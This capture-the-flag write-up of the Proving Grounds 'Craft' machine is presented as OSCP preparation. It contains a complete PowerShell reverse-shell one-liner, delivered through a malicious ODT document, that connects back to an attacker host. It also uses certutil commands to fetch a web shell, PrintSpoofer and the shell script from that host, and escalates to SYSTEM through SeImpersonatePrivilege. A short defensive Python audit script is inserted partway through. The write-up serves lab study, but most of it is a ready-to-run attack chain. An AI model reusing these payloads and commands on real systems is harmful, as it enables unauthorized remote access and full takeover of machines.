Proving Grounds: Craft
Today we will take a look at Proving Grounds: Craft. My purpose in sharing this post is to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.
- Network scan
└─# nmap -Pn -sCV --open -p- --min-rate 10000 -oN nmap/open 192.168.249.169
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 06:58 EDT
Nmap scan report for 192.168.249.169
Host is up (0.22s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Craft
- Apache (80)
- Reverse
Create the malicious ODT file; when the document is opened on the target it runs the PowerShell reverse shell below (the shell lands inside the LibreOffice program folder, as the prompt later shows).
powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
# One-liner TCP reverse shell: connects back to the listener, reads commands, runs them with iex and returns the output with a fake "PS path>" prompt
$client = New-Object System.Net.Sockets.TCPClient("192.168.49.249",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Open a server with Python
└─# python3 -m http.server 8000
Upload the file to the site
└─# nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.249] from (UNKNOWN) [192.168.249.169] 50049
PS C:\Program Files\LibreOffice\program> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
- Apache
The Apache service account has full control over the C:\xampp\htdocs folder, which is the web root. We can use this to get a reverse shell: I will upload a web shell there.
PS C:\Program Files\LibreOffice\program> icacls C:\xampp\htdocs
C:\xampp\htdocs CRAFT\apache:(OI)(CI)(F)
                CRAFT\apache:(I)(OI)(CI)(F)
                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                BUILTIN\Users:(I)(OI)(CI)(RX)
                BUILTIN\Users:(I)(CI)(AD)
                BUILTIN\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)
PS C:\xampp\htdocs\assets> certutil -urlcache -split -f http://192.168.49.249:8000/webshell.php
**** Online ****
0000 …
012e
CertUtil: -URLCache command completed successfully
http://192.168.249.169/assets/webshell.php
From the web shell you can get a reverse shell if you want.
- Administrator (PrintSpoofer64.exe)
PS C:\xampp\htdocs\assets> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\xampp\htdocs\assets> systeminfo
Host Name:                 CRAFT
OS Name:                   Microsoft Windows Server 2019 Standard
Don't forget this formula:
SeImpersonatePrivilege + Microsoft Windows Server 2019 Standard = PrintSpoofer64.exe
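As an added defender-side example (not part of the original writeup), the following Python script parses the two outputs this box hinges on, icacls on the web root and whoami /priv for the service account, and flags the combination that led to SYSTEM here: a non-admin principal with write rights on the web root plus SeImpersonatePrivilege enabled. The sample output is constructed from the listings above; the function and constant names are my own.

```python
import re
# Constructed sample input, in the format of the icacls and whoami /priv output shown in this writeup.
ICACLS_OUTPUT = """\
C:\\xampp\\htdocs CRAFT\\apache:(OI)(CI)(F)
                CRAFT\\apache:(I)(OI)(CI)(F)
                NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\\Administrators:(I)(OI)(CI)(F)
                BUILTIN\\Users:(I)(OI)(CI)(RX)
                BUILTIN\\Users:(I)(CI)(AD)
                BUILTIN\\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""
WHOAMI_PRIV_OUTPUT = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""
# icacls rights that allow creating or modifying files: simple rights F/M/W, specific rights WD/AD/WA/WEA/DC
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC"}
# Principals expected to hold full control of a web root
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "CREATOR OWNER"}
# Optional leading path (first line only), then principal, then one or more (...) groups
ACE_RE = re.compile(r"^(?:[A-Za-z]:\\\S*\s+)?(.+?):((?:\([A-Z,]+\))+)$")

def parse_icacls(output):
    """Return [(principal, tokens)] per ACE line; tokens mix inheritance flags (I, OI, CI, IO) and rights."""
    entries = []
    for line in output.splitlines():
        m = ACE_RE.match(line.strip())
        if m:
            tokens = {t for grp in re.findall(r"\(([^)]+)\)", m.group(2)) for t in grp.split(",")}
            entries.append((m.group(1), tokens))
    return entries

def untrusted_writers(output):
    """Principals outside TRUSTED that hold a write-class right on the directory (sorted, deduplicated)."""
    return sorted({p for p, tokens in parse_icacls(output) if p not in TRUSTED and tokens & WRITE_RIGHTS})

def enabled_privileges(output):
    """Map privilege name -> True if Enabled, from the rows of a 'whoami /priv' table."""
    return {m.group(1): m.group(2) == "Enabled"
            for m in re.finditer(r"^(Se\w+)\s.*\s(Enabled|Disabled)\s*$", output, re.M)}

def audit(icacls_out, whoami_out):
    """The chain on this box: writable web root plus SeImpersonatePrivilege on the service account."""
    findings = [f"web root writable by {p}" for p in untrusted_writers(icacls_out)]
    if enabled_privileges(whoami_out).get("SeImpersonatePrivilege"):
        findings.append("service account holds SeImpersonatePrivilege (Enabled)")
    return findings
```

Running audit(ICACLS_OUTPUT, WHOAMI_PRIV_OUTPUT) reports both the writable web root (for CRAFT\apache and BUILTIN\Users) and the enabled SeImpersonatePrivilege; on a hardened host the service account would get read and execute only on htdocs and the privilege would be removed.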
You can download it here
PS C:\Windows\tasks> certutil -urlcache -split -f http://192.168.49.249:8000/PrintSpoofer.exe
**** Online ****
0000 …
6a00
CertUtil: -URLCache command completed successfully.
PS C:\Windows\tasks> certutil -urlcache -split -f http://192.168.49.249:8000/powershell_reverse_shell.ps1
**** Online ****
0000 …
0268
CertUtil: -URLCache command completed successfully.
PS C:\Windows\tasks> C:\Windows\tasks\PrintSpoofer64.exe -c "cmd /c powershell -c C:/Windows/Tasks/powershell_reverse_shell.ps1"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
└─# nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.249] from (UNKNOWN) [192.168.249.169] 50098
PS C:\Windows\system32> whoami
nt authority\system
We learned to get a reverse shell from an ODT file, and we used PrintSpoofer for privilege escalation.
And now we are SYSTEM.
"If you have any questions or comments, please do not hesitate to write. Have a good day."